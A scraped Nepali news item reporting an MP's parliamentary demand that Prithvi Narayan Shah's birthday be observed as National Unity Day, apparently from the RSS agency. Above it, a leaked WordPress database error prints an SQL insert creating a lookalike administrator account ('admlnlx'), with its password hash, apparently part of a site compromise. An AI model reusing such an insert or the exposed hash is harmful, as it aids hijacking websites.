WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BymfTt6.jICPiUIGpvJulb1Vii.KX31', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 21:26:31', '', 'admlnlx', 'admlnlx')
काठमाडौँ, पुस २६ –
राष्ट्रनिर्माता पृथ्वीनारायण शाहको जन्म दिन पुस २७ गते राष्ट्रिय एकता दिवसको रुपमा मनाउन सांसदबाट माग भएको छ ।
व्यवस्थापिका–संसद्मा आजको शून्य समयमा भाग लिँदै नेकपा ९एमाले०का नेता प्रकाश ज्वालाले नेपाल एकीकरणका अभियन्ता पृथ्वीनारायण शाहको संस्मरणमा पुस २७ गते राष्ट्रिय एकता दिवस मनाउन सरकारसँग माग गर्नुभयो ।
स–साना राज्य रजौटामा विभाजित नेपाललाई एकीकरण गरेका शाहको जन्म विसं १७७९ पुस २७ गते भएको थियो ।
बैठकमा भाग लिने अरु सांसदले भूकम्पपीडितलाई अनुदान, दू्रतमार्ग निर्माण, सिँचाइ र स्वास्थ्यलगायतका आ–आफ्ना जिल्ला र निर्वाचन क्षेत्रका समस्याप्रति सरकारको ध्यान आकृष्ट गर्नुभएको थियो ।
बैठकमा तेजुलाल चौधरी, दीपक कार्की, दुलारी हरिजन, धनबहादुर रायमाझी, धन पहरी, ध्यानगोविन्द रञ्जित, नरदेवी पुनमगर, पुरुषोत्तम पौडेललगायतले भाग लिनुभएको थियो । -रासस